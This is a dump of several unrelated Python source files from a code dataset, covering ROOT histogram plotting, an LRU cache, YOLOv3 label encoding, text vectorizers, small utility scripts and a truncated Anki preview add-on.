self.realData:\n dataLabel = self.dataLabel\n else:\n dataLabel = self.pseudodataLabel\n\n return useData, dataLabel\n\n\n def getRatioInfo(self, useData):\n '''\n figure out of there is a ratio plot and which one\n also determine the canvas indices for the ratios\n '''\n doRatio = False\n doubleRatio = False\n\n # canvas index of ratios\n fracIdx = 2\n diffIdx = 3\n\n if (self.ratio or self.differenceRatio) and useData:\n doRatio = True\n if self.ratio and self.differenceRatio:\n doubleRatio = True\n if not self.ratio:\n diffIdx = 2\n\n return doRatio, doubleRatio, fracIdx, diffIdx\n\n def getyTitle(self, divideByBinWidth, xLabel):\n '''\n get title on y axis\n per default it is 'Events'\n '''\n yTitle = \"Events\"\n \n # add info when divide by bin width was activated\n if divideByBinWidth:\n if xLabel.endswith(\"[GeV]\"):\n yTitle+= \" / GeV\"\n else:\n yTitle+= \" / bin width\"\n\n return yTitle\n\n def setupHistogram(self, h, line, yMin, yMax, yTitle, xLabel, fillColor, doRatio):\n '''\n set plotting style for histograms in stack and as lines\n '''\n # edit range\n h.GetYaxis().SetRangeUser(yMin, yMax)\n\n # edit y axis\n h.GetYaxis().SetTitle(yTitle)\n h.GetYaxis().SetTitleSize(\n h.GetYaxis().GetTitleSize()*1.5)\n h.GetYaxis().SetLabelSize(\n h.GetYaxis().GetLabelSize()*1.2)\n\n # edit x axis\n h.GetXaxis().SetTitle(\"\")\n if not doRatio:\n h.GetXaxis().SetTitle(xLabel)\n\n # edit title an stats\n h.SetTitle(\"\")\n h.SetStats(False)\n\n # edit plotting style\n if line:\n h.SetFillColor(0)\n h.SetLineColor(fillColor)\n h.SetLineWidth(2)\n else:\n h.SetFillColor(fillColor)\n h.SetLineColor(ROOT.kBlack)\n h.SetLineWidth(self.stackLineWidth)\n\n\n\n def getListOfErrorbands(self, hasHistStack, stackTemplates, lineTemplates, templates):\n '''\n determine list of errorbands to be drawn based on the options that are set\n '''\n if self.removeSystErrors:\n errorbands = []\n elif not self.onlyPlotErrorGroups is None:\n errorbands = self.onlyPlotErrorGroups\n else:\n # TODO find better method to automatically determine syst groups\n if hasHistStack:\n errorbands = templates[stackTemplates[-1]].majorSystGroups\n else:\n errorbands = templates[lineTemplates.keys()[0]].majorSystGroups\n\n if self.statError:\n errorbands = list(errorbands)\n errorbands.append(\"stat\")\n\n return errorbands\n\n def setupErrorband(self, g, syst, line = False, processColor = None):\n '''\n get style in which errorband should be drawn\n '''\n ebStyle, ebColor, ebAlpha = hpUtil.getErrorStyle(syst)\n g.SetFillStyle(ebStyle)\n if line:\n ebColor = processColor\n g.SetLineColorAlpha(ebColor, ebAlpha)\n g.SetFillColorAlpha(ebColor, ebAlpha)\n\n def setupDataHistogram(self, data):\n '''\n set style of data histogram\n '''\n data.SetLineColor(ROOT.kBlack)\n data.SetMarkerStyle(20)\n data.SetFillStyle(0)\n data.SetMarkerSize(1.5)\n data.SetLineWidth(1)\n\n def getRatioLine(self, stack, frac, dataLabel, doubleRatio, xLabel):\n '''\n get and setup line drawn to ratio plot\n works for frac and difference ratio\n adjusted with 'frac' option\n '''\n # get line from stack clone\n line = stack.Clone()\n line.Divide(line)\n line.SetFillStyle(0)\n \n # get yaxis label \n if frac:\n label = self.ratioLabel.replace(\"$DATA\",dataLabel)\n else:\n label = self.differenceRatioLabel.replace(\"$DATA\",dataLabel)\n line.GetYaxis().SetTitle(label)\n\n # get xaxis label\n xTitle = xLabel\n if doubleRatio and frac:\n xTitle = \"\"\n line.GetXaxis().SetTitle(xTitle)\n\n # scale axis legends\n line.GetXaxis().SetLabelSize(line.GetXaxis().GetLabelSize()*2.4)\n line.GetXaxis().SetTitleSize(line.GetXaxis().GetTitleSize()*3)\n if doubleRatio and frac:\n line.GetYaxis().SetLabelSize(line.GetYaxis().GetLabelSize()*3.3)\n line.GetYaxis().SetTitleSize(line.GetYaxis().GetTitleSize()*2.5)\n line.GetYaxis().SetTitleOffset(0.3)\n else:\n line.GetYaxis().SetLabelSize(line.GetYaxis().GetLabelSize()*2.2)\n line.GetYaxis().SetTitleSize(line.GetYaxis().GetTitleSize()*1.8)\n line.GetYaxis().SetTitleOffset(0.5)\n\n # set bin contents and errors\n line.GetYaxis().SetNdivisions(505)\n line.GetXaxis().SetLabelOffset(0.01)\n if frac: val = 1\n else: val = 0\n for i in range(line.GetNbinsX()):\n line.SetBinContent(i+1, val)\n line.SetBinError(i+1, 0)\n\n # set line style\n line.SetLineWidth(1)\n line.SetLineColor(ROOT.kBlack)\n\n # set range\n line.GetYaxis().SetRangeUser(0.5,1.5)\n\n return line \n\n def getRatioData(self, data, stack, frac = True):\n '''\n get data histogram for ratio plot\n also return min and max values\n '''\n r = data.Clone()\n if frac:\n rMax = 1\n rMin = 1\n r.Divide(stack.Clone())\n else:\n rMax = 0\n rMin = 0\n\n for iBin in range(r.GetNbinsX()):\n if not frac:\n r.SetBinContent(iBin+1,\n (r.GetBinContent(iBin+1)-stack.GetBinContent(iBin+1)))\n rMax = max(r.GetBinContent(iBin+1), rMax) \n rMim = min(r.GetBinContent(iBin+1), rMin) \n\n r.SetLineColor(ROOT.kBlack)\n r.SetLineWidth(1)\n r.SetMarkerStyle(20)\n ROOT.gStyle.SetErrorX(0)\n return r, rMin, rMax\n \n def setupRatioErrorband(self, g, frac = True):\n '''\n setup errorband for ratio plot\n adjust errorband size to ratio\n '''\n for iBin in range(g.GetN()):\n x = g.GetPointX(iBin)\n y = g.GetPointY(iBin)\n #g.GetPoint(iBin, x, y)\n if not frac:\n g.SetPoint(iBin, x, 1)\n else:\n g.SetPoint(iBin, x, 1)\n if y > 0:\n g.SetPointEYlow( iBin, g.GetErrorYlow(iBin)/y)\n g.SetPointEYhigh(iBin, g.GetErrorYhigh(iBin)/y)\n else:\n g.SetPointEYlow(iBin, 0)\n g.SetPointEYhigh(iBin, 0)\n\n\n\n\n def drawHistogram(self, plotName, xLabel, channelLabel, lumi, \n divideByBinWidth, outFile, templates):\n ''' \n routine to setup the histograms\n get stack histograms, line histograms and data\n plot them in first canvas and add errorbands\n add fractional ratio and difference ratio plot including errorbands\n '''\n\n # figure out which processes in which order are included in the stack\n # lowest is first\n stackTemplates = self.getStackTemplatesInOrder(templates)\n\n # get list of stack histograms and also TGraphAsymErrors for uncertainties\n stackedHistograms, stackErrors = self.stackTemplates(templates, stackTemplates)\n\n # get stack integral\n hasHistStack, stackIntegral = self.getStackIntegral(stackedHistograms)\n \n # get histogram lines to be plotted\n lineTemplates, lineHistograms, lineErrors = self.getLineTemplates(templates, stackIntegral)\n\n # get data\n useData, dataLabel = self.getDataInfo(hasHistStack)\n if useData:\n data = self.getData(templates)\n\n # get plotting range \n yMin, yMax = self.getPlotRange(stackedHistograms, lineHistograms)\n\n # get info about ratios\n doRatio, doubleRatio, fracIdx, diffIdx = self.getRatioInfo(useData)\n\n # get yTitle\n yTitle = self.getyTitle(divideByBinWidth, xLabel)\n \n # load canvas\n c = ps.getCanvas(plotName,\n log = self.logY,\n ratio = doRatio,\n doubleRatio = doubleRatio,\n sideLegend = True\n )\n\n # determine which errorbands to use\n errorbands = self.getListOfErrorbands(\n hasHistStack, stackTemplates, lineTemplates, templates)\n\n # plot stack histograms on canvas\n c.cd(1)\n nLegendEntries = 0\n firstPlot = True\n for idx in range(len(stackTemplates)-1, -1, -1):\n proc = stackTemplates[idx]\n printer.printInfo(\"\\tadding process to stack {}\".format(proc))\n\n self.setupHistogram(stackedHistograms[idx], False,\n yMin, yMax, yTitle, xLabel, templates[proc].color, doRatio)\n\n # draw histogram\n if firstPlot:\n stackedHistograms[idx].Draw(\"histo\")\n firstPlot = False\n else:\n stackedHistograms[idx].Draw(\"histo same\")\n \n nLegendEntries+=1\n\n # add errorbands on stack\n for syst in errorbands:\n printer.printInfo(\"\\tadding errorband {} on stack\".format(syst))\n if not syst in stackErrors:\n printer.printWarning(\"\\t\\tno errorband for sys group {} found\".format(syst))\n continue\n self.setupErrorband(stackErrors[syst], syst, line = False)\n\n # draw errorband\n stackErrors[syst].Draw(\"same2\")\n nLegendEntries+=1\n \n # plot all the lines to be plot\n for line in lineTemplates:\n printer.printInfo(\"\\tdrawing histogram line {}\".format(line))\n\n # setup histogram\n self.setupHistogram(lineHistograms[line], True,\n yMin, yMax, yTitle, xLabel, templates[line].color, doRatio)\n\n # draw histogram\n if firstPlot:\n lineHistograms[line].Draw(\"histo\")\n firstPlot = False\n else:\n lineHistograms[line].Draw(\"histo same\")\n\n nLegendEntries+=1\n\n # include errorbars on lines\n if not self.errorbandOnLines:\n continue\n\n # draw errorband for lines\n for syst in errorbands:\n printer.printInfo(\"\\tadding errorband {} on line {}\".format(syst, line))\n if not syst in lineErrors[line]:\n printer.printWarning(\"\\t\\tno errorband for sys group {} found\".format(syst))\n continue\n\n # setup errorband\n self.setupErrorband(lineErrors[line][syst], \n syst, line = True, processColor = templates[line].color)\n\n # draw errorband\n lineErrors[line][syst].Draw(\"same2\")\n\n\n if useData:\n # setup and draw data histogram\n self.setupDataHistogram(data)\n data.Draw(\"histPEX0same\") \n nLegendEntries+=1 \n \n # redraw the axis\n if hasHistStack:\n stackedHistograms[-1].Draw(\"axissame\")\n\n # setup legend\n l = ROOT.TLegend(0.81,0.93*(1.-nLegendEntries/14.),0.98,0.93)\n l.SetBorderSize(0)\n # add data entry\n if useData:\n l.AddEntry(data, dataLabel, \"P\")\n # add line entries\n for line in lineTemplates:\n lineLabel = templates[line].label\n if not lineTemplates[line] == 1:\n lineLabel+= \" (x {:.0f})\".format(lineTemplates[line])\n l.AddEntry(lineHistograms[line], lineLabel, \"L\")\n # add stack entries\n for idx in range(len(stackTemplates)-1, -1, -1):\n proc = stackTemplates[idx]\n l.AddEntry(stackedHistograms[idx], templates[proc].label, \"F\")\n # add uncertainty entries\n for syst in errorbands:\n if not syst in stackErrors:\n continue\n l.AddEntry(stackErrors[syst], syst, \"F\")\n # draw legend\n l.Draw()\n \n # build fractional ratio\n if self.ratio:\n c.cd(fracIdx)\n \n # get line \n line = self.getRatioLine(stackedHistograms[-1], True,\n dataLabel, doubleRatio, xLabel)\n\n # get data histogram \n r, rMin, rMax = self.getRatioData(data, stackedHistograms[-1], True)\n\n # set ratio range\n line.GetYaxis().SetRangeUser(0.5, 1.5)\n\n # draw ratio line\n line.DrawCopy(\"histo\")\n\n # draw ratio data\n r.DrawCopy(\"sameP\")\n\n # add errorbands\n ratioErrors = {}\n for syst in errorbands:\n if not syst in stackErrors:\n printer.printWarning(\"\\t\\tno errorband for sys group {} found\".format(syst))\n continue\n\n # setup ratio errorband\n ratioErrors[syst] = stackErrors[syst].Clone()\n self.setupRatioErrorband(ratioErrors[syst], frac = True)\n\n # draw errorband\n ratioErrors[syst].Draw(\"same2\")\n\n # redraw the line and data\n line.DrawCopy(\"histo same\")\n r.DrawCopy(\"sameP\")\n\n # build fractional ratio\n if self.differenceRatio:\n c.cd(diffIdx)\n\n # get line\n dline = self.getRatioLine(stackedHistograms[-1], False,\n dataLabel, doubleRatio, xLabel)\n\n # get data histogram\n d, dMin, dMax = self.getRatioData(data, stackedHistograms[-1], False)\n\n # set ratio range\n dline.GetYaxis().SetRangeUser(\n 1.5*max(dMin, -0.2*dMax), 1.5*max(dMax, -0.2*dMin))\n\n # draw ratio line\n dline.DrawCopy(\"histo\")\n\n # draw ratio data\n d.DrawCopy(\"sameP\")\n \n # add errorbands\n diffErrors = {}\n for syst in errorbands:\n if not syst in stackErrors:\n printer.printWarning(\"\\t\\tno errorband for sys group {} found\".format(syst))\n continue\n\n # setup ratio errorband\n diffErrors[syst] = stackErrors[syst].Clone()\n self.setupRatioErrorband(diffErrors[syst], frac = False)\n\n # draw errorband\n diffErrors[syst].Draw(\"same2\")\n\n # redraw the line and data\n dline.DrawCopy(\"histo same\")\n d.Draw(\"sameP\")\n\n\n # add some labels\n ps.printCMSLabel(c, privateWork = self.privateWork, ratio = doRatio)\n if not lumi is None:\n ps.printLumiLabel(c, lumi = lumi, ratio = doRatio, sideLegend = True)\n if not channelLabel is None:\n ps.printChannelLabel(c, channelLabel, ratio = doRatio)\n \n # save output\n c.SaveAs(outFile)\n c.SaveAs(outFile.replace(\".pdf\", \".png\"))\n\n \n","sub_path":"toolbox/harryPlotter/HistogramSetup.py","file_name":"HistogramSetup.py","file_ext":"py","file_size_in_byte":24775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"104220278","text":"\n\nclass Entry:\n def __init__(self, key=None, value=None):\n self.key = key\n self.value = value\n self.next = None\n self.previous = None\n\n\nclass LRUCache:\n # @param capacity, an integer\n def __init__(self, capacity):\n self.capacity = capacity\n self.length = 0\n self.head = Entry()\n self.head.previous = self.head.__next__ = self.head\n self.dictionary = {}\n\n # @return an integer\n def get(self, key):\n if key in self.dictionary:\n entry = self.dictionary.get(key)\n self.sethead(entry)\n return entry.value\n return -1\n\n # @param key, an integer\n # @param value, an integer\n # @return nothing\n def set(self, key, value):\n if key in self.dictionary:\n entry = self.dictionary.get(key)\n entry.value = value\n self.sethead(entry)\n else:\n entry = Entry(key, value)\n if self.length < self.capacity:\n self.add(entry)\n self.dictionary[key] = entry\n self.length += 1\n else:\n self.add(entry)\n self.dictionary[key] = entry\n last = self.head.previous\n self.remove(last)\n self.dictionary.pop(last.key)\n\n def remove(self, entry):\n entry.count_and_say.previous = entry.previous\n entry.previous.count_and_say = entry.count_and_say\n\n def add(self, entry):\n entry.count_and_say = self.head.__next__\n entry.previous = self.head\n entry.count_and_say.previous = entry\n entry.previous.next = entry\n\n def sethead(self, entry):\n self.remove(entry)\n self.add(entry)","sub_path":"Python/LRU Cache.py","file_name":"LRU Cache.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"36690305","text":"#!/usr/bin/python3.5\n\n'a test module'\n__author__='guoguo'\nimport sys\n\ndef test():\n\targs = sys.argv\n\tif len(args) == 1:\n\t\tprint('Hello,world')\n\telif len(args) == 2:\n\t\tprint('Hello,%s' %args[1])\n\telse:\n\t\tprint('Too many arguments')\n\ndef _private_1(name):\n\treturn 'Hello, %s' %name\n\ndef _private_2(name):\n\treturn 'Hi, %s' %name\n\ndef greeting(name):\n\tif len(name) > 3:\n\t\treturn _private_1(name)\n\telse:\n\t\treturn _private_2(name)\n\n\nif __name__ == '__main__':\n\tprint(greeting('ceshi'))\n","sub_path":"module/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"204447050","text":"\nimport cv2\nimport random\nimport numpy as np\n\nfrom Define import *\nfrom Utils import *\n\nfrom DataAugmentation import *\n\nclass YOLOv3_Utils:\n def __init__(self):\n self.input_sizes = np.linspace(MIN_INPUT_SIZE, MAX_INPUT_SIZE, INPUT_SIZE_COUNT)\n self.input_sizes = self.input_sizes.astype(np.int32)\n\n self.strides = np.asarray(STRIDES)\n self.anchors = np.asarray(ANCHORS, dtype = np.float32).reshape((3, 3, 2))\n\n def Encode(self, image_path, gt_bboxes, gt_classes, input_size, augment = False):\n # input_size = random.choice(self.input_sizes)\n output_sizes = input_size // self.strides\n \n image = cv2.imread(image_path)\n if augment:\n image, gt_bboxes, gt_classes = DataAugmentation(image, gt_bboxes, gt_classes)\n\n image_h, image_w, c = image.shape\n\n image = cv2.resize(image, (input_size, input_size), interpolation = cv2.INTER_CUBIC)\n labels = [np.zeros((output_size, output_size, 3, 5 + CLASSES)) for output_size in output_sizes] \n\n # normalize\n gt_bboxes /= [image_w, image_h, image_w, image_h] \n gt_bboxes *= input_size\n\n for gt_bbox, gt_class in zip(gt_bboxes, gt_classes):\n ccwh_bbox = xyxy_to_ccwh(gt_bbox)\n onehot = smooth_one_hot(gt_class, CLASSES)\n\n positive_count = 0\n\n best_max_iou = 0.0\n best_label_index = 0\n best_anchor_index = 0\n\n for i in range(3):\n anchors = np.zeros((3, 4), dtype = np.float32)\n anchors[:, :2] = ccwh_bbox[:2]\n anchors[:, 2:] = self.anchors[i]\n \n # anchors (cx, cy, w, h -> left, top, right, bottom)\n anchors[:, :2], anchors[:, 2:] = anchors[:, :2] - anchors[:, 2:] / 2, \\\n anchors[:, :2] + anchors[:, 2:] / 2\n\n ious = compute_bboxes_IoU(anchors, gt_bbox[np.newaxis, :])[:, 0]\n mask = ious >= IOU_THRESHOLD\n\n if positive_count == 0:\n max_iou = np.max(ious)\n max_index = np.argmax(ious)\n\n if max_iou > best_max_iou:\n best_max_iou = max_iou\n best_label_index = i\n best_anchor_index = max_index\n\n x_index, y_index = (ccwh_bbox[:2] / STRIDES[i]).astype(np.int32)\n \n labels[i][y_index, x_index, mask, :4] = gt_bbox\n labels[i][y_index, x_index, mask, 4] = 1\n labels[i][y_index, x_index, mask, 5:] = onehot\n\n positive_count += np.sum(mask)\n\n if positive_count == 0:\n x_index, y_index = (ccwh_bbox[:2] / STRIDES[best_label_index]).astype(np.int32)\n labels[best_label_index][y_index, x_index, best_anchor_index, :4] = gt_bbox\n labels[best_label_index][y_index, x_index, best_anchor_index, 4] = 1\n labels[best_label_index][y_index, x_index, best_anchor_index, 5:] = onehot\n\n slabel_data = labels[0].reshape((-1, 5 + CLASSES))\n mlabel_data = labels[1].reshape((-1, 5 + CLASSES))\n llabel_data = labels[2].reshape((-1, 5 + CLASSES))\n label_data = np.concatenate([slabel_data, mlabel_data, llabel_data], axis = 0)\n\n return image, label_data\n \n def Decode(self, pred_data, input_size, image_wh, detect_threshold = 0.5, use_nms = True):\n pred_data = pred_data\n mask = pred_data[:, 4] >= detect_threshold\n\n pred_confs = pred_data[mask, 4][:, np.newaxis]\n pred_bboxes = np.concatenate([pred_data[mask, :4], pred_confs], axis = -1)\n\n pred_classes = np.argmax(pred_data[mask, 5:], axis = -1)\n pred_bboxes[:, :4] = convert_bboxes(pred_bboxes[:, :4], image_wh = image_wh, ori_wh = [input_size, input_size])\n\n if use_nms:\n pred_bboxes, pred_classes = class_nms(pred_bboxes, pred_classes)\n\n return pred_bboxes, pred_classes\n \nif __name__ == '__main__':\n\n utils = YOLOv3_Utils()\n\n for data in np.load('./dataset/validation_detection.npy', allow_pickle = True):\n image_name, gt_bboxes, gt_classes = data\n\n image_path = VALID_DIR + image_name\n gt_bboxes = np.asarray(gt_bboxes, dtype = np.float32)\n gt_classes = np.asarray([CLASS_DIC[c] for c in gt_classes], dtype = np.int32)\n\n image = cv2.imread(image_path)\n h, w, c = image.shape\n \n # print(w, h)\n # print(gt_bboxes[:, [0, 2]].min(), gt_bboxes[:, [0, 2]].max())\n # print(gt_bboxes[:, [1, 3]].min(), gt_bboxes[:, [1, 3]].max())\n # print(gt_bboxes.shape)\n\n input_size = 608\n image, label_data = utils.Encode(image_path, gt_bboxes, gt_classes, input_size)\n pred_bboxes, pred_classes = utils.Decode(label_data, input_size, [input_size, input_size])\n\n print(input_size)\n\n for pred_bbox, pred_class in zip(pred_bboxes, pred_classes):\n xmin, ymin, xmax, ymax = pred_bbox[:4].astype(np.int32)\n cv2.putText(image, CLASS_NAMES[pred_class], (xmin, ymin - 10), 1, 1, (0, 255, 0), 2)\n cv2.rectangle(image, (xmin, ymin), (xmax, ymax), (0, 255, 0), 2)\n\n cv2.imshow('show', image)\n cv2.waitKey(0)\n\n # print(image.shape, label_data.keys())\n # print(image.shape, label_data.shape)\n # input()\n ","sub_path":"YOLOv3_Utils.py","file_name":"YOLOv3_Utils.py","file_ext":"py","file_size_in_byte":5419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"335566456","text":"from itertools import tee\n\nimport numpy as np\nfrom rich.progress import track\nfrom scipy.sparse import csr_matrix\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction import FeatureHasher\n\nfrom ..bblock.doc import DocBuilder, Document\nfrom ..bblock.token import Token\nfrom tqdm import tqdm\n\n\ndef check_type(X):\n if not all(isinstance(x, str) for x in X):\n raise ValueError(f\"X should be an iterable string. {type(X)} found\")\n\n\ndef check_doc_type(X):\n if not all(isinstance(x, Document) for x in X):\n raise ValueError(f\"X should be an iterable sadedegel Document. {type(X)} found\")\n\n\nclass OnlinePipeline(Pipeline):\n def partial_fit(self, X, y=None, **kwargs):\n for i, step in enumerate(self.steps):\n name, est = step\n est.partial_fit(X, y, **kwargs)\n if i < len(self.steps) - 1:\n X = est.transform(X)\n return self\n\n\nclass Text2Doc(BaseEstimator, TransformerMixin):\n Doc = None\n\n def __init__(self, tokenizer=\"icu\", hashtag=False, mention=False, emoji=False, progress_tracking=True):\n self.tokenizer = tokenizer\n self.hashtag = hashtag\n self.mention = mention\n self.emoji = emoji\n self.progress_tracking = progress_tracking\n # TODO: Add sadedegel version\n\n self.init()\n\n def init(self):\n if Text2Doc.Doc is None:\n Text2Doc.Doc = DocBuilder(tokenizer=self.tokenizer, tokenizer__hashtag=self.hashtag,\n tokenizer__mention=self.mention, tokenizer__emoji=self.emoji)\n\n def fit(self, X, y=None):\n return self\n\n def partial_fit(self, X, y=None, **kwargs):\n return self\n\n def transform(self, X, y=None):\n if isinstance(X, list):\n check_type(X)\n n_total = len(X)\n else:\n X1, X2, X = tee(X, 3)\n\n check_type(X1)\n n_total = sum((1 for _ in X2))\n\n if n_total == 0:\n raise ValueError(f\"Ensure that X contains at least one valid document. Found {n_total}\")\n\n docs = []\n\n for text in tqdm(X, disable=not hasattr(self, 'progress_tracking') or not self.progress_tracking, unit=\"doc\"):\n docs.append(Text2Doc.Doc(text))\n\n return docs\n\n\nclass SadedegelVectorizer(BaseEstimator, TransformerMixin):\n \"\"\"Sadedegel feature extraction TransformerMixin s don't require fit calls.\"\"\"\n\n def fit(self, X, y=None):\n return self\n\n def partial_fit(self, X, y=None, **kwargs):\n return self\n\n\nclass HashVectorizer(BaseEstimator, TransformerMixin):\n def __init__(self, n_features=1048576, *, alternate_sign=True):\n self.n_features = n_features\n self.alternate_sign = alternate_sign\n\n def fit(self, X, y=None):\n return self\n\n def partial_fit(self, X, y=None, **kwargs):\n return self\n\n def transform(self, docs):\n def feature_iter():\n for d in docs:\n yield [('prefix5', t.lower_[:5]) for t in d.tokens] + [('prefix3', t.lower_[:3]) for t in\n d.tokens]\n\n return FeatureHasher(self.n_features, alternate_sign=self.alternate_sign, input_type=\"pair\",\n dtype=np.float32).transform(feature_iter())\n\n\nclass TfidfVectorizer(SadedegelVectorizer):\n def __init__(self, *, tf_method='raw', idf_method='probabilistic', drop_stopwords=True,\n lowercase=True,\n drop_suffix=True, drop_punct=True, show_progress=True):\n super().__init__()\n\n self.tf_method = tf_method\n self.idf_method = idf_method\n self.lowercase = lowercase\n self.drop_suffix = drop_suffix\n self.drop_stopwords = drop_stopwords\n self.drop_punct = drop_punct\n self.show_progress = show_progress\n\n def transform(self, X, y=None):\n if isinstance(X, list):\n check_doc_type(X)\n n_total = len(X)\n else:\n X1, X2, X = tee(X, 3)\n\n check_doc_type(X1)\n n_total = sum((1 for _ in X2))\n\n if n_total == 0:\n raise ValueError(f\"Ensure that X contains at least one valid document. Found {n_total}\")\n\n indptr = [0]\n indices = []\n data = []\n for doc in track(X, total=n_total, description=\"Transforming document(s)\", update_period=1,\n disable=not self.show_progress):\n if self.lowercase:\n n_vocabulary = doc.builder.tokenizer.vocabulary.size\n else:\n n_vocabulary = doc.builder.tokenizer.vocabulary.size_cs\n\n tfidf = doc.get_tfidf(self.tf_method, self.idf_method, drop_stopwords=self.drop_stopwords,\n lowercase=self.lowercase,\n drop_suffix=self.drop_suffix,\n drop_punct=self.drop_punct)\n\n for idx in tfidf.nonzero()[0]:\n indices.append(idx)\n data.append(tfidf[idx])\n\n indptr.append(len(indices))\n\n return csr_matrix((data, indices, indptr), dtype=np.float32, shape=(n_total, n_vocabulary))\n\n\nclass BM25Vectorizer(SadedegelVectorizer):\n def __init__(self, *, tf_method='raw', idf_method='probabilistic', k1=1.25, b=0.75, delta=0,\n drop_stopwords=True,\n lowercase=True, drop_suffix=True, drop_punct=True, show_progress=True):\n\n super().__init__()\n\n self.tf_method = tf_method\n self.idf_method = idf_method\n self.lowercase = lowercase\n self.drop_suffix = drop_suffix\n self.drop_stopwords = drop_stopwords\n self.drop_punct = drop_punct\n self.show_progress = show_progress\n self.k1 = k1\n self.b = b\n self.delta = delta\n\n def transform(self, X, y=None):\n if isinstance(X, list):\n check_doc_type(X)\n n_total = len(X)\n else:\n X1, X2, X = tee(X, 3)\n\n check_doc_type(X1)\n n_total = sum((1 for _ in X2))\n\n if n_total == 0:\n raise ValueError(f\"Ensure that X contains at least one valid document. Found {n_total}\")\n\n indptr = [0]\n indices = []\n data = []\n for doc in track(X, total=n_total, description=\"Transforming document(s)\", update_period=1,\n disable=not self.show_progress):\n\n if self.lowercase:\n n_vocabulary = doc.builder.tokenizer.vocabulary.size\n else:\n n_vocabulary = doc.builder.tokenizer.vocabulary.size_cs\n\n bm25 = doc.get_bm25(self.tf_method, self.idf_method, drop_stopwords=self.drop_stopwords,\n lowercase=self.lowercase,\n drop_suffix=self.drop_suffix,\n drop_punct=self.drop_punct,\n k1=self.k1, b=self.b, delta=self.delta)\n\n for idx in bm25.nonzero()[0]:\n indices.append(idx)\n data.append(bm25[idx])\n\n indptr.append(len(indices))\n\n return csr_matrix((data, indices, indptr), dtype=np.float32, shape=(n_total, n_vocabulary))\n","sub_path":"sadedegel/extension/sklearn.py","file_name":"sklearn.py","file_ext":"py","file_size_in_byte":7288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"551154782","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\nmi, sigma=100,15\nx=mi+sigma*np.random.randn(500000)\nsigma**2 #średnie odchylenie standardowe\nn, bins, patches=plt.hist(x,50,density=True,facecolor='green',alpha=0.75)#przezroczystosc0,75\nbincenters=0.5*(bins[1:]+bins[:-1])#ustalamy granice skrajne i dzielimy przez 2\ny=mlab.normpdf(bincenters,mi,sigma)\nl=plt.plot(bincenters, y,'r--',linewidth=1)\nplt.show()\n","sub_path":"zadanie3_7.py","file_name":"zadanie3_7.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"26106927","text":"def sqrt(x):\n if x < 0:\n raise ValueError('invalid input')\n if x == 0:\n return 0\n left = 1\n right = x\n while left <= right:\n mid = left + (right - left) // 2\n if x / mid == mid:\n return mid\n elif x / mid < mid:\n right = mid - 1\n else:\n left = mid + 1\n return right\n\nprint(sqrt(12)) # 3","sub_path":"project_1/practice_12.py","file_name":"practice_12.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"33045176","text":"# -*- mode: Python ; coding: utf-8 -*-\n# Copyright © 2013 Roland Sieker \n# License: GNU AGPL, version 3 or later;\n# http://www.gnu.org/licenses/agpl.html\n#\n# Provenance: Large parts of this file are taken from the clayout.py\n# CardLayout class from Anki2.\n# written by Damien Elmes \n\n\"\"\"\nShow a preview of the current card.\n\nAnki2 add-on to show a preview of the current card in the card\nbrowser.\n\"\"\"\n\nimport re\n\nfrom PyQt4.QtCore import Qt, SIGNAL\nfrom PyQt4.QtGui import QDialog, QHBoxLayout, QVBoxLayout, QWidget, QPushButton\nfrom PyQt4.QtWebKit import QWebPage\n\nimport aqt\nfrom anki.sound import playFromText, clearAudioQueue\nfrom aqt.utils import saveGeom, restoreGeom, getBase, mungeQA,\\\n showInfo, askUser, openHelp, openLink\nfrom anki.utils import isMac, isWin, joinFields\n# from anki.lang import _\nfrom aqt.webview import AnkiWebView\nimport anki.js\n\n\nclass CardPreview(QDialog):\n\n def __init__(self, mw, parent=None):\n QDialog.__init__(self, parent or mw, Qt.Window)\n self.mw = aqt.mw\n self.card = None\n self.main = QVBoxLayout()\n self.setLayout(main)\n self.setup_main()\n\n def setup_main(self):\n \"\"\"\n Add the front and back preview\n\n This is mostly taken from clayout.\n \"\"\"\n bl = QHBoxLayout()\n self.main.addLayout(bl)\n preview = QWidget()\n pform = aqt.forms.preview.Ui_Form()\n pform.setupUi(preview)\n if self.style().objectName() == \"gtk+\":\n # gtk+ requires margins in inner layout\n pform.frontPrevBox.setContentsMargins(0, 11, 0, 0)\n pform.backPrevBox.setContentsMargins(0, 11, 0, 0)\n pform.frontWeb = AnkiWebView()\n pform.frontPrevBox.addWidget(pform.frontWeb)\n pform.backWeb = AnkiWebView()\n pform.backPrevBox.addWidget(pform.backWeb)\n def linkClicked(url):\n openLink(url)\n for wig in pform.frontWeb, pform.backWeb:\n wig.page().setLinkDelegationPolicy(\n QWebPage.DelegateExternalLinks)\n c(wig, SIGNAL(\"linkClicked(QUrl)\"), linkClicked)\n self.main.addWidget(preview, 5)\n w.setLayout(l)\n\n\n def show(self, card):\n self.card = card\n self.renderPreview()\n\n def renderPreview(self):\n c = self.card\n if not c:\n return\n ti = self.maybeTextInput\n base = getBase(self.mw.col)\n self.tab['pform'].frontWeb.stdHtml(\n ti(mungeQA(c.q(reload=True))), self.mw.reviewer._styles(),\n bodyClass=\"card card%d\" % (c.ord+1), head=base,\n js=anki.js.browserSel)\n self.tab['pform'].backWeb.stdHtml(\n ti(mungeQA(c.a()), type='a'), self.mw.reviewer._styles(),\n bodyClass=\"card card%d\" % (c.ord+1), head=base,\n js=anki.js.browserSel)\n clearAudioQueue()\n if c.id not in self.playedAudio:\n playFromText(c.q())\n playFromText(c.a())\n self.playedAudio[c.id] = True\n\n def maybeTextInput(self, txt, type='q'):\n if type == 'q':\n repl = 